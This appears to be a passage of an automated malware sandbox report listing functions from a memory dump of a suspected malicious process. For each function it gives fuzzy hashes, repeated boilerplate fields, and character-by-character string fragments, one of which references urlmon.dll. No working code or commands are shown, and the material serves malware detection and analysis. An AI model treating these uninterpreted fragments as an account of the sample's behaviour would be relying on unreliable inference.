Instruction ID: 357f9da22bd7593272e4513144b8f4e0401d57abb055932ee997bf9af3e65838
Opcode Fuzzy Hash: 248c1c988b4bc60454d637e734bbd8b9090022b426ccd27192b63faa7b0d496b
Instruction Fuzzy Hash: BA410AB1D11219AFDB14CF99C881AEEBBBCEF49710F10415AFA14EB240E7B49640CBA4

Function 034E0074 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20c5161cfaca4839c49affc46277ea3bea1e0bf3a60c53bf07eb32d75ac4a110
Instruction ID: 397088da26e26761c35ae66c464fc500671347e4c73e892612cde6651e345b9a
Opcode Fuzzy Hash: 20c5161cfaca4839c49affc46277ea3bea1e0bf3a60c53bf07eb32d75ac4a110
Instruction Fuzzy Hash: 9731B5B5A01248AFDB54DF99D880EDEB7B9AF88300F10811AF919AB344D770A951CFA5

Function 034E01E4 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36efc90a191cc8e1acb2cbc95141c0817a0f98ded27903fbb6edd25e471f27f6
Instruction ID: 2c99df211cc004d79aa2f21a140c76982f93baeb0b8ad3e80336b6f7438ba88a
Opcode Fuzzy Hash: 36efc90a191cc8e1acb2cbc95141c0817a0f98ded27903fbb6edd25e471f27f6
Instruction Fuzzy Hash: FF31E8B5A01248AFDB14DF99D880EDEB7F9EF88300F10811AF919AB344D770A911CFA5

Function 034DFA94 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51cf64d0f59d2a2f5903f909fb618573ca7ac651082d8029cf20bdcbbfce8574
Instruction ID: 92cccfd3e5625517319c17c7ad102806f1145ec478a8546b188268c47e1b8901
Opcode Fuzzy Hash: 51cf64d0f59d2a2f5903f909fb618573ca7ac651082d8029cf20bdcbbfce8574
Instruction Fuzzy Hash: 573129B5A01248AFDB14DF99D840EEFB7F8EF88300F10815AF919AB344D774A911CBA5

Function 034E0404 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9a00a10a89320d2365596c4e1edbce81330555d2f3f88fead6d60e9e01336a7
Instruction ID: e1cee40f5757209848dac730826e6994c0c028553d64d11f7696baa7b1bcf9ff
Opcode Fuzzy Hash: e9a00a10a89320d2365596c4e1edbce81330555d2f3f88fead6d60e9e01336a7
Instruction Fuzzy Hash: 7D2116B5A01249AFDB14DF99D841EEFB7B8EF88700F00851EF9199B244E670A9118BA5

Function 034CEE24 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27737e8e6ece675ce1d2bb7574dd13e3b7aa2c5ace40779e49464fab5c6974bb
Instruction ID: dbf6f59c89b139a5700dd769e4a3bbef2ec4b562897ecf669e2bebe37ae906d7
Opcode Fuzzy Hash: 27737e8e6ece675ce1d2bb7574dd13e3b7aa2c5ace40779e49464fab5c6974bb
Instruction Fuzzy Hash: F1118AB63803057BF724EA569C42F6B775CDB84B55F244019FB04AE1C1D6F4B81146B9

Function 034DC834 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08d519a3b5ad65d5d6f6bc9fb00b5de2f0d6c7b8374cc299f321c9c9a3cae0d5
Instruction ID: 5a98d1919980273f952fb44510a78db090432acb951ff48d846f5344a113dd1f
Opcode Fuzzy Hash: 08d519a3b5ad65d5d6f6bc9fb00b5de2f0d6c7b8374cc299f321c9c9a3cae0d5
Instruction Fuzzy Hash: E021D3B6D01218AF8F40DFA9D8419EFB7F9EF88210F14416EE919EB200E7715A15CBE5

Function 034DF8A4 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bd2e624a1a168c4e1e8c50df21c848e56bccd97a60291107c18ad1a446637dd
Instruction ID: 79b6cac7979b9215fb980ee33005b9cdeec8d3c5500b09796423d758f710c345
Opcode Fuzzy Hash: 1bd2e624a1a168c4e1e8c50df21c848e56bccd97a60291107c18ad1a446637dd
Instruction Fuzzy Hash: 45114C759413487FD710EBA9CC41FEFB7ACDB85700F00844EF9595F240E6706A018BA5

Function 034DF724 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55da61158ea8d509a0b618acb5c98caaa5ab2921a8fb329b34e50b75e11f4ecd
Instruction ID: dda1931ff81783f2e158baa87995309c896319e78a3d8efe4d76624f81a22013
Opcode Fuzzy Hash: 55da61158ea8d509a0b618acb5c98caaa5ab2921a8fb329b34e50b75e11f4ecd
Instruction Fuzzy Hash: DD113A75941248AFDB20EB99CC41FEF77ACDB84700F00444EFA195E240D6706901CBA5

Function 034DCF94 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d5fe88348bfbad3aa1cd19038867d06393f25a1171069d40e5c2f1c929e3626
Instruction ID: e9a54fdb063d8a9afab0b5b9d107947ac5ed19b432dfdfd6d8b1012bd58dcc6a
Opcode Fuzzy Hash: 1d5fe88348bfbad3aa1cd19038867d06393f25a1171069d40e5c2f1c929e3626
Instruction Fuzzy Hash: 5A11DDB6D01218AFCB40DFA9D9409EEBBF9EF48210F14456AE919EB200E7715A05CBA4

Function 034BACA5 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 907a26f83b60ff804e8e75734cabab12cb2faad6ce1ddc1f8fbfe36a8ca30404
Instruction ID: ba8804a5adf0e9fbefc4702fd650693a9cd7db3974059bc0c991c85f623dc896
Opcode Fuzzy Hash: 907a26f83b60ff804e8e75734cabab12cb2faad6ce1ddc1f8fbfe36a8ca30404
Instruction Fuzzy Hash: E51193B1C21229AF8B44CFAD99845DEBFF8BB09621B14825BE858EB201D7754641CF94

Function 034E0764 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 499a315fd9cb8297bb1461eefacef7f4e0ee28131f4312401ad39fe70fbe6b69
Instruction ID: a56889c7cd26127a570ebe2a08a772605f778ae00d5ede31270c664437943ec4
Opcode Fuzzy Hash: 499a315fd9cb8297bb1461eefacef7f4e0ee28131f4312401ad39fe70fbe6b69
Instruction Fuzzy Hash: E301C0B2214608BFDB44DE99DC80EEB77ADAF8C710F408209BA09E7240D630F851CBA4

Function 034DC2B4 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8f510f219543e96da5b50c8eacf672c8b1ec9e2d5375a54727b85bc17751ae0
Instruction ID: d18679fdfe07c5b5e07f84eb50e1f3b0f3669c0c3e30d7714580e4b5bb11c58d
Opcode Fuzzy Hash: f8f510f219543e96da5b50c8eacf672c8b1ec9e2d5375a54727b85bc17751ae0
Instruction Fuzzy Hash: EF01A9B6D01218AFCB80DFE9D9409EEBBF9FB48200F14556EE519F7240E7715A048BA5

Function 034BAE04 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dd8ac2ceb27e9c91d8c0b4c1a2f686038303f6c13edea2518e4703a00cc3066
Instruction ID: 27624cad0cd3f357944e1acb8dad51c885b6afe6a02948a8f1135118e8a54ebf
Opcode Fuzzy Hash: 6dd8ac2ceb27e9c91d8c0b4c1a2f686038303f6c13edea2518e4703a00cc3066
Instruction Fuzzy Hash: A4F0A7B3A503166BD710DA5EAC80BCAF7DCEB85234F240223FA1C8F341D672D86182B4

Function 034CEFDD Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2710e3e5e1091f894e86c7e77e0563afb78bf92c6a0331c4c6188eabe90e3a50
Instruction ID: b675148762015182bce83147020eb9ddfdc1ac92481629aa92955cfdabf8d0b4
Opcode Fuzzy Hash: 2710e3e5e1091f894e86c7e77e0563afb78bf92c6a0331c4c6188eabe90e3a50
Instruction Fuzzy Hash: A6F04CB5C08388AECB14E791CD44AEDBB78EF85305F0442CFD4081F1A1D7709955CB56

Function 034DF9A4 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 942f22dd66351255330709656270324bba483122c31851c653639574cd8a48d0
Instruction ID: 8d1eccb0870a60e0419dbe4d308b48d96161b1ffd80e748e5bb43fc92e672526
Opcode Fuzzy Hash: 942f22dd66351255330709656270324bba483122c31851c653639574cd8a48d0
Instruction Fuzzy Hash: D6F08C752102087FCB00EF89DC40EEB77ACEFC8710F004019B9189B200D270B9218BB4

Function 034BADF9 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 093c98a545e92f4913d86eee3bbaa88944105ad51241fe2cb1909bb8bda31759
Instruction ID: 07a6bb7b5354d08b093ae0f0334a09c4560e6bc788de400fea944c8b932d145e
Opcode Fuzzy Hash: 093c98a545e92f4913d86eee3bbaa88944105ad51241fe2cb1909bb8bda31759
Instruction Fuzzy Hash: 3FE0D87391421A6BCB019A9E9C448C7FBACEB893307150222E5585F211D7319C62C7F4

Function 034CEF44 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6bef720faee9834855caf57942a688cf2c396a758853a73bacac07e7a767cd9
Instruction ID: dc39ca6a0d587a20a71935d4698b95b682800939615a85162c805dd4d8558c75
Opcode Fuzzy Hash: b6bef720faee9834855caf57942a688cf2c396a758853a73bacac07e7a767cd9
Instruction Fuzzy Hash: F3F05E75815248EBDB14CF64D841BDEBBB8EF44360F1043AEE8259B280D73497948785

Function 034E0684 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b3bf7aaabc3abd77079e067ca5665540d511f7f4f2f3ad1481f7685c8ca6f67
Instruction ID: 508a23f2880342c6ed21a94e6b85cdb4451da021dcf52debf21d3761912b3570
Opcode Fuzzy Hash: 1b3bf7aaabc3abd77079e067ca5665540d511f7f4f2f3ad1481f7685c8ca6f67
Instruction Fuzzy Hash: 73E092752403447FC614EE99DC41EEB33ACDFC8710F004419F908AB240C630B9118BB8

Function 034E2514 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86e50d17f054dfbd0b02fcb37dc35588106972a5b67bdbff8fdfc9e68158c7d3
Instruction ID: d28016135d2f1d9603b982c796312691771b99d3b024afdd07da4550ad05caea
Opcode Fuzzy Hash: 86e50d17f054dfbd0b02fcb37dc35588106972a5b67bdbff8fdfc9e68158c7d3
Instruction Fuzzy Hash: 43E04F3660072437D620A69A9C15FABB75CDBD1A62F09046AFE199F350E5A0A90083E9

Function 034CEF41 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e8b7b156308037716890f66a82095ec44ec4795702f7e032d3bbac91bde6603
Instruction ID: bbd4aede993493102ba95bbff834151a87495e9895b00d749f100ea2f8006c0d
Opcode Fuzzy Hash: 4e8b7b156308037716890f66a82095ec44ec4795702f7e032d3bbac91bde6603
Instruction Fuzzy Hash: 15E09275925108EBDB08CF64D981B9DB768EF44351F1483AEF819DF280D335C7948745

Function 034E0374 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d72440d65b0c06861669640819b658a19e7f91c22ad93aaab60b09b481231f25
Instruction ID: 4ba8b668ae2d24875fbc58c4e5ba9de205459e29d3e6eb28d8b385b1a2887ebc
Opcode Fuzzy Hash: d72440d65b0c06861669640819b658a19e7f91c22ad93aaab60b09b481231f25
Instruction Fuzzy Hash: CFE046762802447FD620EA9ADC01EDB77ADDFC5750F00801AFA08AF241C671BA1187B4

Non-executed Functions

Function 034C14AF Relevance: 38.9, Strings: 31, Instructions: 108COMMON

Download Yara Rule

Strings

wc, xrefs: 034C1568
f, xrefs: 034C1782
F, xrefs: 034C14FB
%, xrefs: 034C1663
hG, xrefs: 034C1557
4A, xrefs: 034C16B0
y, xrefs: 034C14F4
C, xrefs: 034C15E7
v, xrefs: 034C1627
;a, xrefs: 034C168A
M, xrefs: 034C1659
2", xrefs: 034C153C
I, xrefs: 034C1750
6, xrefs: 034C176E
AQ, xrefs: 034C16C5
(9, xrefs: 034C15B8
", xrefs: 034C1778
c., xrefs: 034C16BE
gz, xrefs: 034C15A4
^, xrefs: 034C175A
), xrefs: 034C15F1
A, xrefs: 034C1605
Z, xrefs: 034C163B
Z, xrefs: 034C1510
{, xrefs: 034C1735
nL, xrefs: 034C178C
El, xrefs: 034C1619
*o, xrefs: 034C1528
6<, xrefs: 034C14E0
y, xrefs: 034C15FB
~, xrefs: 034C1502

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: "$%$(9$)$*o$2"$4A$6$6<$;a$A$AQ$C$El$F$I$M$Z$Z$^$c.$f$gz$hG$nL$wc$y$y${$~$v
API String ID: 0-1293273012
Opcode ID: 6c51d8433ebba944d801e22e2aba1704001ebfcb43e8f94d33f823900defbd97
Instruction ID: 2c03b2b27049340a99e04fab873557e971c193cf8b1d8f780cbed92bb218df50
Opcode Fuzzy Hash: 6c51d8433ebba944d801e22e2aba1704001ebfcb43e8f94d33f823900defbd97
Instruction Fuzzy Hash: E67139B0C05268DBEB60CF81C9587DEBBB1BB05308F5081C9C1593B381C7BA1A99CF95

Function 034D9804 Relevance: 34.0, Strings: 27, Instructions: 264COMMON

Download Yara Rule

Strings

v, xrefs: 034D9838
w, xrefs: 034D98BE
g, xrefs: 034D9874
$, xrefs: 034D9860
5, xrefs: 034D98B0
u, xrefs: 034D987E
Q, xrefs: 034D98DA
s, xrefs: 034D9892
%, xrefs: 034D99EA
T, xrefs: 034D98EF
), xrefs: 034D98A6
$, xrefs: 034D989C
., xrefs: 034D9A9F
m, xrefs: 034D98B7
}, xrefs: 034D9888
J, xrefs: 034D9920
urlmon.dll, xrefs: 034D9A46, 034D9A49
}, xrefs: 034D986A
>, xrefs: 034D9842
i, xrefs: 034D9AA6
B, xrefs: 034D9919
F, xrefs: 034D98CC
h, xrefs: 034D982E
F, xrefs: 034D98E1
E, xrefs: 034D98C5
), xrefs: 034D984C
H, xrefs: 034D98D3

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
API String ID: 0-1002149817
Opcode ID: 631ae6293cbb5e99b0b97ab870b13abb70138bc161ab9fab6b20d6021944df4c
Instruction ID: ff77ab361ec1424528259d5d06d321475243690883b618197215d4c8d894c958
Opcode Fuzzy Hash: 631ae6293cbb5e99b0b97ab870b13abb70138bc161ab9fab6b20d6021944df4c
Instruction Fuzzy Hash: FAC10CB5D00368AEDB61DFA5CC44BEEBBB8AF04704F00459ED50CAB241E7B54A88CF65

Function 034D66B4 Relevance: 25.2, Strings: 20, Instructions: 250COMMON

Download Yara Rule

Strings

I, xrefs: 034D673A
e, xrefs: 034D6755
2, xrefs: 034D67C5
t, xrefs: 034D67B0
I, xrefs: 034D677F
o, xrefs: 034D679B
x, xrefs: 034D6763
, xrefs: 034D675C
g, xrefs: 034D67BE
m, xrefs: 034D67A2
i, xrefs: 034D6794
l, xrefs: 034D676A
r, xrefs: 034D6771
r, xrefs: 034D674E
t, xrefs: 034D6786
r, xrefs: 034D6778
t, xrefs: 034D6744
\, xrefs: 034D67A9
r, xrefs: 034D67B7
l, xrefs: 034D678D

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
API String ID: 0-3236418099
Opcode ID: d9181e4831c196229a0f61800df094e08f6528bf922ce09ae948933dae25a9a1
Instruction ID: db0a090ca3efddb8cc0bbdfe05e1e7f3dd017c01d91cb0a16282448430d62a8b
Opcode Fuzzy Hash: d9181e4831c196229a0f61800df094e08f6528bf922ce09ae948933dae25a9a1
Instruction Fuzzy Hash: B79170B5900258AEDB24DF95CC40FEEB7BCEF44305F44419EA60CAE150EBB55B888F65

Function 034D1E24 Relevance: 16.4, Strings: 13, Instructions: 194COMMON

Download Yara Rule

Strings

o, xrefs: 034D1EB6
m, xrefs: 034D1EC4
s, xrefs: 034D1ED9
F, xrefs: 034D1ECB
l, xrefs: 034D1ED2
i, xrefs: 034D1E85
, xrefs: 034D1E7E
o, xrefs: 034D1E93
e, xrefs: 034D1E8C
r, xrefs: 034D1EBD
x, xrefs: 034D1E5F
P, xrefs: 034D1EAF
., xrefs: 034D1E55

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: $.$F$P$e$i$l$m$o$o$r$s$x
API String ID: 0-392141074
Opcode ID: 30948cbc467faa461901c863f4503a0b16b4e5e8ec53be6e5e1d02cd83937300
Instruction ID: f16a8857eb1c4c1037cae4b879b951da53566cdde3ae2c471c13cc71ee5ee477
Opcode Fuzzy Hash: 30948cbc467faa461901c863f4503a0b16b4e5e8ec53be6e5e1d02cd83937300
Instruction Fuzzy Hash: 577110B5C11318AEDB55EBA5CC91FDEB7BCAF04700F00859EE508AE150EBB167488FA5

Function 034D1E21 Relevance: 16.4, Strings: 13, Instructions: 175COMMON

Download Yara Rule

Strings

o, xrefs: 034D1EB6
m, xrefs: 034D1EC4
s, xrefs: 034D1ED9
F, xrefs: 034D1ECB
l, xrefs: 034D1ED2
i, xrefs: 034D1E85
, xrefs: 034D1E7E
o, xrefs: 034D1E93
e, xrefs: 034D1E8C
r, xrefs: 034D1EBD
x, xrefs: 034D1E5F
P, xrefs: 034D1EAF
., xrefs: 034D1E55

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: $.$F$P$e$i$l$m$o$o$r$s$x
API String ID: 0-392141074
Opcode ID: 4a42494abd2be828d65efff71d186fa937b818047140a46fa9c59d578b4299dc
Instruction ID: cc6845d8209ebbfb4287295bc4d961bac0d032d0bfda7edfc5359f29d225eb20
Opcode Fuzzy Hash: 4a42494abd2be828d65efff71d186fa937b818047140a46fa9c59d578b4299dc
Instruction Fuzzy Hash: 82610EB5D11318AEDB55EBA5CC91FDEB7BCAF04700F00859EE508AE150EBB067488F65

Function 034C5A34 Relevance: 13.8, Strings: 11, Instructions: 84COMMON

Download Yara Rule

Strings

i, xrefs: 034C5ACF
w, xrefs: 034C5AC1
r, xrefs: 034C5A76
e, xrefs: 034C5A8B
\, xrefs: 034C5A61
r, xrefs: 034C5A7D
D, xrefs: 034C5ABA
n, xrefs: 034C5AC8
l, xrefs: 034C5A6F
e, xrefs: 034C5A84
x, xrefs: 034C5A68

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: D$\$e$e$i$l$n$r$r$w$x
API String ID: 0-685823316
Opcode ID: dda497dedb711bfd0a09de673490b31902d3387e8dc57a9a1eca5c12a34e14a3
Instruction ID: 802d7e0751e0f1530ed750cdf79b19049404275769f78b9883ba2ed668cd768e
Opcode Fuzzy Hash: dda497dedb711bfd0a09de673490b31902d3387e8dc57a9a1eca5c12a34e14a3
Instruction Fuzzy Hash: BF2161B5D1131CAEEF54DF94CC45BEEBBB9AF08704F00815DE608BA180DBB516488BA5

Function 034C5A2C Relevance: 13.8, Strings: 11, Instructions: 82COMMON

Download Yara Rule

Strings

i, xrefs: 034C5ACF
w, xrefs: 034C5AC1
r, xrefs: 034C5A76
e, xrefs: 034C5A8B
\, xrefs: 034C5A61
r, xrefs: 034C5A7D
D, xrefs: 034C5ABA
n, xrefs: 034C5AC8
l, xrefs: 034C5A6F
e, xrefs: 034C5A84
x, xrefs: 034C5A68

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: D$\$e$e$i$l$n$r$r$w$x
API String ID: 0-685823316
Opcode ID: d15661ad42771e76b6dc99b41afd63167b10e1d72024271b266a45ccba66c7f5
Instruction ID: c4bd003e56e766cdfcee2969f6b352c766fce2d8f1817f6ad92c503e45d90efa
Opcode Fuzzy Hash: d15661ad42771e76b6dc99b41afd63167b10e1d72024271b266a45ccba66c7f5
Instruction Fuzzy Hash: 84216DB5D11318AEEF54DF90CC84BEEBBB9BF08704F10815DE6147B280DBB516488BA9

Function 034BE594 Relevance: 13.8, Strings: 11, Instructions: 43COMMON

Download Yara Rule

Strings

i, xrefs: 034BE5CE
G, xrefs: 034BE5CA
4, xrefs: 034BE5A2
h, xrefs: 034BE5BE
F, xrefs: 034BE59A
`, xrefs: 034BE5D2
U, xrefs: 034BE5A6
*, xrefs: 034BE5AE
+, xrefs: 034BE5AA
[, xrefs: 034BE5D6
2, xrefs: 034BE5DA

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: *$+$2$4$F$G$U$[$`$h$i
API String ID: 0-1460244710
Opcode ID: 1ce270acd40121c32a3d4328d746f41d1a40f47f042b50cdb4e285213c97d023
Instruction ID: 693fa1e9899e0ebcc9ec8375e6297968f56f190fb441ebad422afe06a52379e3
Opcode Fuzzy Hash: 1ce270acd40121c32a3d4328d746f41d1a40f47f042b50cdb4e285213c97d023
Instruction Fuzzy Hash: 4911C910D087CEDDDB12C6BC98482AEBF715F23224F4882D9D4A52A2D2D27A4716C7B6

Function 034D6B74 Relevance: 12.8, Strings: 10, Instructions: 342COMMON

Download Yara Rule

Strings

P, xrefs: 034D6BF6
:, xrefs: 034D6BD6
m, xrefs: 034D6C16
N, xrefs: 034D6C0F
:, xrefs: 034D6C04
t, xrefs: 034D6BE8
I, xrefs: 034D6BCF
:, xrefs: 034D6C1D
s, xrefs: 034D6BFD
A, xrefs: 034D6BE1

Memory Dump Source

Source File: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, Offset: 03310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3310000_xTzxorEdKnFN.jbxd

Yara matches

Similarity

API ID:
String ID: :$:$:$A$I$N$P$m$s$t
API String ID: 0-2304485323
Opcode ID: 06a8d458e6462ba2ac6dcb966caf956be05c74fb83fb97fcbf58ea8a407fdd46
Instruction ID: 279e344803e095a9199aa943e677b5149b93b9eb29ef944a2c00a47ccd853443
Opcode Fuzzy Hash: 06a8d458e6462ba2ac6dcb966caf956be05c74fb83fb97fcbf58ea8a407fdd46
